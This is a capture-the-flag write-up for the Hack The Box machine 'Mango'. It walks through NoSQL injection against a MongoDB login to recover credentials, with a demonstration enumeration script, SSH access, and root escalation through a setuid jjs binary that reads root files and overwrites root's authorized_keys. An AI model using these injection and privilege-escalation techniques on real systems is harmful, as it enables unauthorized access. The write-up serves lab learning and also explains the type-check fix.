When life gives you mangos. This box has little to do with real mangos, but its name differs by only one letter from a well-known NoSQL platform, and that is exactly where the initial access lies. An interesting Medium box that raised my score by 30 points and took me from Hacker to Pro Hacker on Hack The Box.
[0x1] Reconnaissance & Enumeration
A new box, a new scan. It sounds boring, but every box starts with a good scan: it gives you a clear picture of where the journey can begin.
nmap -sC -sV -T5 -p- -oA ~/Documents/boxes/mango/magno-allports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 11:37 GMT
Nmap scan report for staging-order.mango.htb (
Host is up (0.033s latency).
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Sweet & Juicy
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
On port 80 you will not get a website, whether you use the IP address or the hostname mango.htb. On port 443 you do, and the first thing that appears is a browser warning that the certificate is not valid for the name you used.
Tip: if you get a certificate warning, always inspect the certificate. Even when you expect it to be wrong, it is often worth it. Mango's certificate carries an interesting commonName: staging-order.mango.htb. Add it to /etc/hosts next to mango.htb so the virtual host can be reached by name.
Before I look at the hostname from the certificate, I first sift through the standard website. There is nothing immediately interesting here: it is a search engine in the style of Google, but XSS and similar tricks get you nowhere. The analytics link exposes all kinds of data, but that can be filed under rabbit holes.
Then I try the hostname from the certificate. That looks a lot better.
[0x2] Initial foothold
Here too I started on all the usual ways to abuse the login form. SQL injection did not work, but when I tried NoSQL injection I got a surprising result: a page that says Under Plantation. So NoSQL injection is possible. The login builds its MongoDB query straight from the submitted fields, so a request that turns username or password into an operator object (for example username[$ne]=x) is evaluated as a query operator instead of a string, and a $regex in the same position turns the login page into a yes/no oracle for the stored values.
Coincidentally, I had recently saved the URL of a handy tool that performs exactly this kind of NoSQL injection against MongoDB (hey, that sounds like Mango ;)).
git clone https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration.git
Cloning into 'Nosql-MongoDB-injection-username-password-enumeration'...
remote: Enumerating objects: 56, done.
remote: Counting objects: 100% (56/56), done.
remote: Compressing objects: 100% (56/56), done.
remote: Total 56 (delta 15), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (56/56), done.
The Python script takes a number of parameters: the URL, the names of the username and password fields, the field to enumerate, the login button and the HTTP method. It then builds a regular-expression pattern anchored at the start of the value and completes it letter by letter, using the login response as a yes/no oracle. Of course I removed some superfluous output so the listing does not become endless.
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep username -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'

2 username(s) found:
admin
mango
Two usernames in the pocket. Now I do the same again, but for the passwords.
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep password -m POST
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'

2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2
Two hits here too. All that remains is to find out which password belongs to which user; you notice that quickly enough when you log in.
- Username: admin / Password: t9KcS3>!0B#2
- Username: mango / Password: h3mXK8RhU~f{]f5H
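To show what the enumeration script is actually doing, here is an added example (my own code, not the an0nlk tool from the write-up and not the box's PHP). It runs offline against a constructed in-memory stand-in for the vulnerable login: the USERS collection, its values and both login functions are made up for the demonstration. `enumerate_field` is the reusable part; against a real target you would replace the `login` oracle with an HTTP POST and a check for the success page, exactly as the tool does.

```python
"""Blind NoSQL injection: auth bypass with $ne and value extraction with $regex.

Added example for this write-up. A PHP login that passes $_POST['username']
and $_POST['password'] straight into find() receives a request body such as
    username[$regex]=^ad&password[$regex]=.*
as nested arrays, so the query becomes {"username": {"$regex": "^ad"}, ...}
and the login response tells the attacker whether the prefix is right.
"""
import re
import string

# Constructed sample collection for the demo (not the box's real records). The
# values deliberately contain regex metacharacters: without escaping, a prefix
# such as "s3cr3t{" would be an invalid pattern and the search would stall.
USERS = [
    {"username": "alice", "password": "s3cr3t{x}"},
    {"username": "bob", "password": "h~unter]2"},
]

ALPHABET = string.digits + string.ascii_letters + string.punctuation


def mongo_match(value, cond):
    """The subset of MongoDB query semantics the attack relies on."""
    if isinstance(cond, dict):
        if "$regex" in cond:
            return re.search(cond["$regex"], value) is not None
        if "$ne" in cond:
            return value != cond["$ne"]
        return False
    return value == cond  # honest string comparison


def vulnerable_login(post):
    """Stand-in for a handler that builds the query straight from the POST
    data; dict values arrive exactly like PHP's array-style parameters."""
    query = {"username": post["username"], "password": post["password"]}
    return any(all(mongo_match(doc[k], v) for k, v in query.items())
               for doc in USERS)


def hardened_login(post):
    """Same handler with the check that closes the hole: operators can only
    be smuggled in through non-string values, so refuse anything else."""
    if not all(isinstance(post[k], str) for k in ("username", "password")):
        return False
    return vulnerable_login(post)


def enumerate_field(field, login, alphabet=ALPHABET):
    """Recover every stored value of `field` through the yes/no oracle `login`.

    Same idea as the enumeration script: anchor a regex at the start of the
    value, extend the known prefix one character at a time (escaped, so that
    {, ] and friends are matched literally) and confirm a complete value with
    ^prefix$. Depth-first, so "admin" and "admin2" would both be found."""
    other = "password" if field == "username" else "username"

    def ask(regex):
        return login({field: {"$regex": regex}, other: {"$regex": ".*"}})

    found, stack = [], [""]
    while stack:
        prefix = stack.pop()
        if prefix and ask("^" + re.escape(prefix) + "$"):
            found.append(prefix)
        stack.extend(prefix + ch for ch in alphabet
                     if ask("^" + re.escape(prefix + ch)))
    return sorted(found)


if __name__ == "__main__":
    # Authentication bypass: $ne matches every document, no password needed.
    print("bypass:", vulnerable_login({"username": {"$ne": ""},
                                       "password": {"$ne": ""}}))
    for field in ("username", "password"):
        print(field, enumerate_field(field, vulnerable_login))
    print("hardened:", enumerate_field("username", hardened_login))
```

Two details matter in practice: the prefix must be escaped before it goes into the pattern (the real password on this box contains `~`, `{` and `]`), and the fix is not a blacklist of `$` strings but a type check, because the operator only gets in when the parameter is an array rather than a string.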
First I try to log in over SSH as admin, but without result. The port is open according to the Nmap scan, but apparently this user is not allowed to connect over SSH.
ssh admin@
admin@'s password:
Permission denied, please try again.
Then I continue with the user mango. This time I get access via SSH and I am logged in.
sudo ssh mango@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
mango@'s password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
[0x3] Path to User flag
There is nothing interesting in mango's home directory, just some scripts left behind by other HTB-ers. I browse to admin's folder and find the user flag there, but without rights to read it. From mango's session I use su to switch to admin with the password found earlier. That works, and one step further on I have a full bash shell as admin.
mango@mango:~$ su admin
Password:
$ whoami
admin
$ bash
[0x4] Path to Root flag
With SimpleHTTPServer I start a web server on my own machine and download LinPEAS (Linux Privilege Escalation Awesome Script) for further enumeration.
wget
--2020-02-26 09:57:54--
Connecting to  connected.
HTTP request sent, awaiting response... 200 OK
Length: 144338 (141K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh    100%[================================================================>] 140.96K   159KB/s    in 0.9s

2020-02-26 09:57:55 (159 KB/s) - 'linpeas.sh' saved [144338/144338]
The script produces a lot of output and checks the machine for cron jobs, places where I have more rights than I should, vulnerable processes and so on. Twice I run into /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs: once as an interesting file and once in the SUID list, i.e. a binary that runs with its owner's privileges (root's) no matter who executes it. jjs is the command-line tool that runs JavaScript on the Nashorn engine that ships with the JDK; a setuid-root jjs therefore lets admin run arbitrary Java code as root.
admin@mango:/tmp$ bash linpeas.sh
linpeas v2.3.4 by carlospolop
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/bin/fusermount
/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/umount  --->  BSD/Linux(08-1996)
/bin/su
/bin/ping
/snap/core/7713/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount  --->  BSD/Linux(08-1996)
/snap/core/7713/usr/bin/chfn  --->  SuSE_9.3/10
..
..
..
/usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
On GTFOBins I come across jjs with some well-known privilege escalations: one for a shell, one for reading files and one for writing files. To test whether it works I try to read /root/root.txt through jjs, using Java's BufferedReader from the Nashorn script. Because the binary is setuid root, the JVM opens the file as root:
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
var line;
while ((line = br.readLine()) != null) { print(line); }' | jjs
8a8ef79a7a2fbb01ea81688424e9ab15
The breakout succeeds and I can read root.txt. Fine for the points, but yeah... it is not a shell yet.
A second method is writing data. In this case I take my public key from my Parrot VM and write it to root's authorized_keys on Mango. With that I should be able to log in with my private key, without a password, provided that root is allowed to log in over SSH at all. The $EXEC function is only available when jjs is started with -scripting, and since JDK 9 Nashorn's $EXEC handles the > redirection itself, so no shell is needed in between. Note that a single > replaces any keys root already had; >> would only append.
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs -scripting
jjs> $EXEC("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg[[........]]h87orudH7MJ2bFhALQ0=' > /root/.ssh/authorized_keys");
Successful! Connecting as root with the authorized key works, and besides the root flag I now also have a full shell on the machine. Who am I? Root!
ssh -i /root/.ssh/id_rsa mango
Enter passphrase for key '/root/.ssh/id_rsa':
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

System information as of Wed Feb 26 09:46:26 UTC 2020

Last login: Thu Oct 10 08:33:27 2019
root@mango:~# hostname
mango
root@mango:~# whoami
root
root@mango:~# ls -l
total 4
-r-------- 1 root root 33 Sep 27 14:32 root.txt
root@mango:~# cat root.txt
8a8ef79a7a2fbb01ea81688424e9ab15